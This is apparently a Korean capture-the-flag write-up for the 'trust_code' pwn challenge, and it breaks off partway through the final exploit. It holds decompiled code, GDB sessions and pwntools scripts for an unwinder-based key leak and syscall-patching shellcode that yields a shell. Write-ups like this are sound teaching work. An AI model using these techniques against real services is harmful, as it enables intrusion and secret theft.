<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">char</span> *__fastcall <span class="title function_">decrypt</span><span class="params">(<span class="type">char</span> *in)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="built_in">std</span>::exception *exception; <span class="comment">// [rsp+8h] [rbp-120h]</span></span><br><span class="line">  <span class="type">char</span> *out; <span class="comment">// [rsp+18h] [rbp-110h]</span></span><br><span class="line">  <span class="type">char</span> key[<span class="number">248</span>]; <span class="comment">// [rsp+28h] [rbp-100h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v5; <span class="comment">// [rsp+120h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v5 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  out = (<span class="type">char</span> *)operator new[](<span class="number">48uLL</span>);</span><br><span class="line">  AES_set_decrypt_key((__int64)&amp;secret_key, <span class="number">128LL</span>, (<span class="type">int</span> *)key);</span><br><span class="line">  AES_cbc_encrypt((__int64)in, (__int64)out, <span class="number">48LL</span>, (__int64)key, (__int64)iv, <span class="number">0</span>);</span><br><span class="line">  <span class="keyword">if</span> ( <span class="built_in">strncmp</span>(out, <span class="string">&quot;TRUST_CODE_ONLY!&quot;</span>, <span class="number">16uLL</span>) )</span><br><span class="line">  &#123;</span><br><span class="line">    exception = (<span class="built_in">std</span>::exception *)__cxa_allocate_exception(<span class="number">8uLL</span>);</span><br><span class="line">    <span class="built_in">std</span>::exception::exception(exception);</span><br><span class="line">    __cxa_throw(</span><br><span class="line">      exception,</span><br><span class="line">      (<span class="keyword">struct</span> type_info *)&amp;`typeinfo <span class="keyword">for</span><span class="number">&#x27;</span><span class="built_in">std</span>::exception,</span><br><span class="line">      (<span class="type">void</span> (__fastcall *)(<span class="type">void</span> *))&amp;<span class="built_in">std</span>::exception::~exception);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> out;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>decrypt</code> 가 반환하는 <code>out</code> 은 그대로 <code>read_code</code> 의 반환값이 되어, <code>run</code> 함수에서 상위 16바이트를 제외한 나머지가 <code>sc.code</code> 로 복사됩니다. 이후 호출되는 <code>execute</code> 함수는 rwx 권한의 페이지를 할당하여 <code>sc.code</code> 의 내용을 복사하고 실행합니다. 이 때 <code>invalid_check</code> 함수에서 <code>sc.code</code> 를 필터링하는데, <code>\x0f</code> 또는 <code>\x05</code> 가 존재하지 않을 때만 실행을 허용합니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> __fastcall <span class="title function_">execute</span><span class="params">(<span class="type">unsigned</span> __int8 *a1)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">void</span> (*addr)(<span class="type">void</span>); <span class="comment">// [rsp+8h] [rbp-20h]</span></span><br><span class="line">  <span class="type">char</span> buf[<span class="number">8</span>]; <span class="comment">// [rsp+18h] [rbp-10h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v3; <span class="comment">// [rsp+20h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v3 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="type">unsigned</span> <span class="type">int</span>)invalid_check(a1) != <span class="number">-1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    addr = (<span class="type">void</span> (*)(<span class="type">void</span>))create_rwx(a1);</span><br><span class="line">    addr();</span><br><span class="line">    munmap(addr, <span class="number">0x1000</span>uLL);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;done?&gt; &quot;</span>);</span><br><span class="line">  read(<span class="number">0</span>, buf, <span class="number">2uLL</span>);</span><br><span class="line">  <span class="keyword">if</span> ( buf[<span class="number">0</span>] == <span class="string">&#x27;y&#x27;</span> || buf[<span class="number">0</span>] == <span class="string">&#x27;Y&#x27;</span> )</span><br><span class="line">    loop_cont = <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>이상의 내용을 정리하면 프로그램은 다음과 같이 동작합니다.</p>
<ol>
<li><code>iv</code> 와 AES-CBC로 암호화된 code를 입력받아 평문으로 복호화합니다.</li>
<li>평문의 상위 16바이트가 <code>&quot;TRUST_CODE_ONLY!&quot;</code> 가 아닌 경우 예외를 발생시킵니다.</li>
<li>평문에 <code>\x0f</code> 또는 <code>\x05</code> 가 존재하지 않은 경우에만 rwx 페이지로 복사하여 실행합니다.</li>
</ol>
<h2 id="%EB%AC%B8%EC%A0%9C-%ED%92%80%EC%9D%B4" tabindex="-1">문제 풀이</h2>
<p>셸을 획득하기 위해서는 상위 16바이트를 <code>&quot;TRUST_CODE_ONLY!&quot;</code>, 나머지를 셸코드로 채운 문자열을 AES-CBC로 암호화하여 code로 입력해야 합니다. 프로그램에서 복호화 과정에 특별한 취약점이 없고 <code>iv</code> 는 직접 입력할 수 있습니다. 따라서 서버에서 사용하는 <code>key</code> 값을 유출하여 올바른 암호문을 생성해야 합니다.</p>
<p>그런데 프로그램을 테스트하기 위해 <code>iv</code> 에 16개의 a, <code>code</code> 에 48개의 a를 입력하면 다음과 같이 명시적으로 호출하지도 않은 출력 루틴이 동작하는 것을 확인할 수 있습니다.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r = process(<span class="string">&quot;./trust_code&quot;</span>)</span><br><span class="line"><span class="comment"># context.log_level = &quot;debug&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    r.sendafter(<span class="string">b&quot;iv&gt;&quot;</span>, <span class="string">b&quot;a&quot;</span> * <span class="number">16</span>)</span><br><span class="line">    r.sendafter(<span class="string">b&quot;code&gt;&quot;</span>, <span class="string">b&quot;a&quot;</span> * <span class="number">48</span>)</span><br><span class="line"></span><br><span class="line">    r.interactive()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$ ./test.py</span><br><span class="line">[+] Starting local process &#x27;./trust_code&#x27;: pid 2560632</span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line"> [*] Process &#x27;./trust_code&#x27; stopped with exit code 0 (pid 2560632)</span><br><span class="line"></span><br><span class="line">= Executed =</span><br><span class="line">\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00</span><br><span class="line">Sorry for the inconvenience, there was a problem while decrypting code.</span><br><span class="line">[*] Got EOF while reading in interactive</span><br></pre></td></tr></table></figure>
<p>출력 루틴의 정체는 <code>run</code> 함수에 존재하는 랜딩 패드입니다. <code>run</code> 함수에서 <code>Shellcode</code> 객체를 선언하는데, 예외가 발생하면 스택 되감기 과정에서 이 객체를 소멸시켜야 하므로 소멸자를 호출하는 랜딩 패드를 먼저 방문하는 것입니다. <code>run</code> 함수의 그래프를 살펴보면 그림에서 색칠한 부분과 같이 다른 루틴과 동떨어진 블록이 하나 있습니다. 이 블록이 바로 랜딩 패드입니다.</p>
<p><img src="/images/line22-trust-code/1.png" alt="1.png"></p>
<p>이번에는 버퍼 오버플로우를 일으키기 위해 code에 16개의 a와 8개의 b, 8개의 c를 입력하였습니다. 실행하면 세그멘테이션 오류가 발생하며 종료하는데, &quot;stack smashing detected&quot;와 같은 오류 메시지가 출력되지 않습니다. 이는 Canary 보호 기법에 의한 것이 아니라 다른 루틴에서 오류가 발생하여 종료하였음을 나타냅니다.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># ...</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    r.sendafter(<span class="string">b&quot;iv&gt;&quot;</span>, <span class="string">b&quot;a&quot;</span> * <span class="number">16</span> + <span class="string">b&quot;b&quot;</span> * <span class="number">8</span> + <span class="string">b&quot;c&quot;</span> * <span class="number">8</span>)</span><br><span class="line">    r.sendafter(<span class="string">b&quot;code&gt;&quot;</span>, <span class="string">b&quot;a&quot;</span> * <span class="number">48</span>)</span><br><span class="line"></span><br><span class="line">    r.interactive()</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ ./test.py</span><br><span class="line">[+] Starting local process &#x27;./trust_code&#x27;: pid 2562716</span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line"> [*] Got EOF while reading in interactive</span><br><span class="line">$</span><br><span class="line">[*] Process &#x27;./trust_code&#x27; stopped with exit code -11 (SIGSEGV) (pid 2562716)</span><br><span class="line">[*] Got EOF while sending in interactive</span><br></pre></td></tr></table></figure>
<p>GDB를 붙여 실행하면 오류가 발생한 원인은 <code>_Unwind_RaiseException</code> 함수에서 호출한 루틴이 주소 <code>0x6363636363636363</code> 에 접근을 시도하였기 때문임을 확인할 수 있습니다. 이 주소는 버퍼 오버플로우를 일으키기 위해 입력한 8개의 c에 해당합니다. 또한 <code>_Unwind_RaiseException</code> 함수를 디스어셈블하면 호출한 루틴은 <code>uw_frame_state_for</code> 내장 함수임을 알 수 있습니다. (자세한 설명은 말머리에서 링크한 글의 ‘동적 분석’ 문단을 참고하기 바랍니다)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">Program received signal SIGSEGV, Segmentation fault.</span><br><span class="line">0x00007ff413636c50 in ?? () from /lib/x86_64-linux-gnu/libgcc_s.so.1</span><br><span class="line">Python Exception &lt;class &#x27;AttributeError&#x27;&gt;: &#x27;NoneType&#x27; object has no attribute &#x27;startswith&#x27;</span><br><span class="line">...</span><br><span class="line">pwndbg&gt; pdisass 1</span><br><span class="line"> ► 0x7ff413636c50    cmp    byte ptr [rax], 0x48</span><br><span class="line">   0x7ff413636c53    jne    0x7ff413636bb0                &lt;0x7ff413636bb0&gt;</span><br><span class="line"></span><br><span class="line">   0x7ff413636c59    movabs rdx, 0x50f0000000fc0c7</span><br><span class="line">pwndbg&gt; i r rax</span><br><span class="line">rax            0x6363636363636363  7161677110969590627</span><br><span class="line">pwndbg&gt; k</span><br><span class="line">#0  0x00007ff413636c50 in ?? () from /lib/x86_64-linux-gnu/libgcc_s.so.1</span><br><span class="line">#1  0x00007ff41363808b in _Unwind_RaiseException () from /lib/x86_64-linux-gnu/libgcc_s.so.1</span><br><span class="line">#2  0x00007ff41383b69c in __cxa_throw () from /lib/x86_64-linux-gnu/libstdc++.so.6</span><br><span class="line">#3  0x000055ffe2bb5333 in decrypt(unsigned char*) ()</span><br><span class="line">#4  0x000055ffe2bb53d6 in read_code() ()</span><br><span class="line">#5  0x000055ffe2bb5627 in run() ()</span><br><span class="line">#6  0x000055ffe2bb56d0 in loop() ()</span><br><span class="line">#7  0x000055ffe2bb5748 in service() ()</span><br><span class="line">#8  0x6363636363636363 in ?? ()</span><br><span class="line">#9  0x0000000000000000 in ?? ()</span><br><span class="line">pwndbg&gt; disass _Unwind_RaiseException</span><br><span class="line">Dump of assembler code for function _Unwind_RaiseException:</span><br><span class="line">...</span><br><span class="line">   0x00007ff413638080 &lt;+304&gt;:   mov    rsi,r13</span><br><span class="line">   0x00007ff413638083 &lt;+307&gt;:   mov    rdi,r12</span><br><span class="line">   0x00007ff413638086 &lt;+310&gt;:   call   0x7ff413636800</span><br><span class="line">   0x00007ff41363808b &lt;+315&gt;:   cmp    eax,0x5</span><br><span class="line">   0x00007ff41363808e &lt;+318&gt;:   je     0x7ff413638103 &lt;_Unwind_RaiseException+435&gt;</span><br></pre></td></tr></table></figure>
<p><code>uw_frame_state_for</code> 내장 함수는 인자로 전달된 <code>context</code> 구조체가 나타내는 프레임의 CIE와 FDE를 찾아 해석하는 함수입니다. 이 함수 내부에서 페이로드로 입력한 주소에 접근하는 것은 버퍼 오버플로우로 인해 먼저 스택이 오염되고, 오염된 내용을 스택 되감기 과정에서 참조하면서 <code>context</code> 구조체가 오염되었기 때문임을 추론할 수 있습니다. 이를 확인하기 위해 <code>uw_frame_state_for</code> 함수를 호출하는 <code>_Unwind_RaiseException+310</code> 주소에 중단점을 설정하고 GDB를 붙여 실행해 보겠습니다.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; set $context=$rdi</span><br><span class="line">pwndbg&gt; continue</span><br><span class="line">...</span><br><span class="line">pwndbg&gt; x/20gx $rdi</span><br><span class="line">0x7ffd76e021f0: 0x00007ffd76e02468      0x00007ffd76e02470</span><br><span class="line">0x7ffd76e02200: 0x0000000000000000      0x00007ffd76e02478</span><br><span class="line">0x7ffd76e02210: 0x0000000000000000      0x0000000000000000</span><br><span class="line">0x7ffd76e02220: 0x00007ffd76e024b0      0x0000000000000000</span><br><span class="line">0x7ffd76e02230: 0x0000000000000000      0x0000000000000000</span><br><span class="line">0x7ffd76e02240: 0x0000000000000000      0x0000000000000000</span><br><span class="line">0x7ffd76e02250: 0x00007ffd76e024b8      0x00007ffd76e024c0</span><br><span class="line">0x7ffd76e02260: 0x00007ffd76e02490      0x00007ffd76e02498</span><br><span class="line">0x7ffd76e02270: 0x00007ffd76e026b8      0x0000000000000000</span><br><span class="line">0x7ffd76e02280: 0x00007ffd76e026c0      0x000055d6cf1f7748</span><br><span class="line">pwndbg&gt; continue</span><br><span class="line">...</span><br><span class="line">pwndbg&gt; x/20gx $context</span><br><span class="line">0x7fff5b23be70: 0x00007fff5b23c0e8      0x00007fff5b23c0f0</span><br><span class="line">0x7fff5b23be80: 0x0000000000000000      0x00007fff5b23c0f8</span><br><span class="line">0x7fff5b23be90: 0x0000000000000000      0x0000000000000000</span><br><span class="line">0x7fff5b23bea0: 0x00007fff5b23c130      0x0000000000000000</span><br><span class="line">0x7fff5b23beb0: 0x0000000000000000      0x0000000000000000</span><br><span class="line">0x7fff5b23bec0: 0x0000000000000000      0x0000000000000000</span><br><span class="line">0x7fff5b23bed0: 0x00007fff5b23c138      0x00007fff5b23c140</span><br><span class="line">0x7fff5b23bee0: 0x00007fff5b23c110      0x00007fff5b23c118</span><br><span class="line">0x7fff5b23bef0: 0x00007fff5b23c368      0x0000000000000000</span><br><span class="line">0x7fff5b23bf00: 0x00007fff5b23c370      0x6363636363636363</span><br></pre></td></tr></table></figure>
<p>계속 실행하다 보면 <code>context-&gt;ra</code> 필드의 값이 <code>0x000055d6cf1f7748</code> 에서 <code>0x6363636363636363</code> 으로 바뀌는 것을 확인할 수 있습니다. 전자는 버퍼 오버플로우가 발생하는 <code>service</code> 루틴의 내부이고, 후자는 버퍼 오버플로우로 인해 변조된 리턴 주소입니다.</p>
<p><code>context-&gt;ra</code> 필드는 스택 되감기 과정에서 personality 루틴이 랜딩 패드의 주소를 구하기 위해 참조하는 값입니다. 따라서 이 필드의 값을 적절히 변조하면 원하는 랜딩 패드를 방문할 수 있습니다. 앞서 <code>run</code> 함수는 출력 루틴인 <code>Shellcode</code> 의 소멸자를 호출하는 랜딩 패드를 가지고 있었습니다. <code>context-&gt;ra</code> 필드의 값을 <code>run</code> 함수 내부에서 <code>read_code</code> 함수를 호출하는 <code>run+23</code> 으로 변조하면, personality 루틴은 이를 기준으로 랜딩 패드의 주소를 구합니다. 그 결과 실행 흐름이 옮겨지면 <code>run</code> 함수의 랜딩 패드를 다시 방문하게 됩니다.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; disass run</span><br><span class="line">Dump of assembler code for function run():</span><br><span class="line">   0x000055d6cf1f7610 &lt;+0&gt;:     sub    rsp,0x48</span><br><span class="line">   0x000055d6cf1f7614 &lt;+4&gt;:     mov    rax,QWORD PTR fs:0x28</span><br><span class="line">   0x000055d6cf1f761d &lt;+13&gt;:    mov    QWORD PTR [rsp+0x40],rax</span><br><span class="line">   0x000055d6cf1f7622 &lt;+18&gt;:    call   0x55d6cf1f7370 &lt;read_code()&gt;</span><br><span class="line">   0x000055d6cf1f7627 &lt;+23&gt;:    mov    QWORD PTR [rsp],rax</span><br><span class="line">   ...</span><br></pre></td></tr></table></figure>
<p>그런데 변조되는 값은 <code>context-&gt;ra</code> 만이므로, 프레임 자체는 <code>service</code> 함수를 호출하는 <code>launch</code> 함수로 되감아진 상태에서 실행 흐름만 <code>run</code> 함수의 랜딩 패드로 옮겨지게 됩니다. 그리고 <code>launch</code> 함수는 서버에 존재하는 AES 키 값인 <code>secret_key.txt</code> 파일을 읽어 스택 버퍼에 저장하는 함수입니다. 따라서 랜딩 패드에서 <code>Shellcode</code> 구조체의 소멸자는 스택에 선언된 <code>sc.code</code> 라고 생각되는 값을 출력하겠지만, 실제로는 <code>launch</code> 함수의 프레임에 존재하는 AES 키 값이 출력될 것입니다.</p>
<p>바이너리에서 <code>run+23</code> 코드의 오프셋은 <code>0x1627</code> 입니다. ASLR에 의해 하위 12비트를 제외한 주소는 런타임에 랜덤하게 정해지므로, 실제 주소의 하위 2바이트가 <code>0x5627</code> 이라고 가정하면 <eq><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mn>1</mn><mi mathvariant="normal">/</mi><mn>16</mn></mrow><annotation encoding="application/x-tex">1/16</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord">1/16</span></span></span></span></eq>의 확률로 일치하게 됩니다. 따라서 다음과 같이 <code>key</code> 값을 유출하기 위한 코드를 작성할 수 있습니다.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r = remote(<span class="string">&quot;localhost&quot;</span>, <span class="number">1234</span>)</span><br><span class="line"><span class="comment"># r = process(&quot;./trust_code&quot;)</span></span><br><span class="line">context.log_level = <span class="string">&quot;debug&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    r.sendafter(<span class="string">b&quot;iv&gt;&quot;</span>, <span class="string">b&quot;a&quot;</span> * <span class="number">24</span> + <span class="string">b&quot;\x27\x56&quot;</span>)</span><br><span class="line">    r.sendafter(<span class="string">b&quot;code&gt;&quot;</span>, <span class="string">b&quot;a&quot;</span> * <span class="number">8</span>)</span><br><span class="line"></span><br><span class="line">    r.interactive()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
<p>셸 스크립트로 무한 루프를 만들어 성공할 때까지 반복 실행하면 다음과 같이 <code>key</code> 값인 <code>&quot;USER_SECRET_KEY!&quot;</code> 가 출력됨을 확인할 수 있습니다.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">$ while [ true ]; do ./leak.py; done</span><br><span class="line">[+] Opening connection to localhost on port 1234: Done</span><br><span class="line">...</span><br><span class="line">[+] Opening connection to localhost on port 1234: Done</span><br><span class="line">[DEBUG] Received 0x4 bytes:</span><br><span class="line">    b&#x27;iv&gt; &#x27;</span><br><span class="line">[DEBUG] Sent 0x1a bytes:</span><br><span class="line">    b&quot;aaaaaaaaaaaaaaaaaaaaaaaa&#x27;V&quot;</span><br><span class="line">[DEBUG] Received 0x6 bytes:</span><br><span class="line">    b&#x27;code&gt; &#x27;</span><br><span class="line">[DEBUG] Sent 0x8 bytes:</span><br><span class="line">    b&#x27;a&#x27; * 0x8</span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line"> [DEBUG] Received 0xa5 bytes:</span><br><span class="line">    00000000  0a 3d 20 45  78 65 63 75  74 65 64 20  3d 0a 00 00  │·= E│xecu│ted │=···│</span><br><span class="line">    00000010  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  │····│····│····│····│</span><br><span class="line">    00000020  00 00 00 00  00 00 00 00  00 00 00 00  00 00 0a 3d  │····│····│····│···=│</span><br><span class="line">    00000030  20 45 78 65  63 75 74 65  64 20 3d 0a  00 1c 01 00  │ Exe│cute│d =·│····│</span><br><span class="line">    00000040  00 00 00 00  79 00 00 00  00 00 00 00  55 53 45 52  │····│y···│····│USER│</span><br><span class="line">    00000050  5f 53 45 43  52 45 54 5f  4b 45 59 21  0a 53 6f 72  │_SEC│RET_│KEY!│·Sor│</span><br><span class="line">    00000060  72 79 20 66  6f 72 20 74  68 65 20 69  6e 63 6f 6e  │ry f│or t│he i│ncon│</span><br><span class="line">    00000070  76 65 6e 69  65 6e 63 65  2c 20 74 68  65 72 65 20  │veni│ence│, th│ere │</span><br><span class="line">    00000080  77 61 73 20  61 20 70 72  6f 62 6c 65  6d 20 77 68  │was │a pr│oble│m wh│</span><br><span class="line">    00000090  69 6c 65 20  64 65 63 72  79 70 74 69  6e 67 20 63  │ile │decr│ypti│ng c│</span><br><span class="line">    000000a0  6f 64 65 2e  0a                                     │ode.│·│</span><br><span class="line">    000000a5</span><br><span class="line"></span><br><span class="line">= Executed =</span><br><span class="line">\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00</span><br><span class="line">= Executed =</span><br><span class="line">\x00\x00\x00\x00\x00\x00\x00\x00SER_SECRET_KEY!</span><br><span class="line">Sorry for the inconvenience, there was a problem while decrypting code.</span><br><span class="line">[*] Got EOF while reading in interactive</span><br></pre></td></tr></table></figure>
<p><code>key</code> 값을 유출하였으므로 셸코드를 암호화하여 전송하면 되는데, <code>\x0f</code> 와 <code>\x05</code> 를 사용하면 실패하는 조건이 있습니다. 따라서 <code>syscall</code> 와 <code>sysenter</code> 인스트럭션을 통해 시스템 콜을 호출할 수 없습니다. 그런데 코드가 복사 후 실행되는 영역은 쓰기와 실행이 모두 가능한 rwx 페이지입니다. 그러므로 런타임에 동적으로 셸코드의 내용을 수정하는 코드를 추가하면 <code>syscall</code> 인스트럭션을 실행할 수 있습니다.</p>
<p>사용자가 입력한 코드를 호출하는 부분은 <code>execute+57</code> 입니다. 이 주소에 중단점을 걸고 실행하면 해당 위치에서 <code>rax</code> 레지스터에는 rwx 페이지의 주소, <code>rsi</code> 레지스터에는 <code>0x1000</code> 이 저장되어 있습니다.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">Breakpoint 1, 0x000055f56b7fb589 in execute(unsigned char*) ()</span><br><span class="line">...</span><br><span class="line">pwndbg&gt; pdisass 1</span><br><span class="line"> ► 0x55f56b7fb589    call   qword ptr [rsp + 8]           &lt;0x7fb6a29c7000&gt;</span><br><span class="line"></span><br><span class="line">   0x55f56b7fb58d    mov    rdi, qword ptr [rsp + 8]</span><br><span class="line">   0x55f56b7fb592    mov    esi, 0x1000</span><br><span class="line">pwndbg&gt; i r rax rsi</span><br><span class="line">rax            0x7fb6a29c7000      140422388936704</span><br><span class="line">rsi            0x1000              4096</span><br><span class="line">pwndbg&gt; vmmap $rax</span><br><span class="line">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA</span><br><span class="line">    0x7fb6a29c7000     0x7fb6a29c8000 rwxp     1000 0      [anon_7fb6a29c7] +0x0</span><br></pre></td></tr></table></figure>
<p>이들 레지스터의 값을 이용하여 셸코드의 마지막 2바이트에 <code>\x0f\x05</code> 를 대입하는 코드를 추가한 익스플로잇 코드를 다음과 같이 작성합니다. 익스플로잇 코드를 실행하면 셸을 획득할 수 있습니다.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> AES</span><br><span class="line"></span><br><span class="line">r = remote(<span class="string">&quot;localhost&quot;</span>, <span class="number">1234</span>)</span><br><span class="line"><span class="comment"># context.log_level = &quot;debug&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    sc = <span class="string">b&quot;\x66\x81\xee\xf1\x0a\x66\x89\x70\x1e&quot;</span>    <span class="comment"># sub si,0xaf1 ; mov [rax+30],si</span></span><br><span class="line">    sc += <span 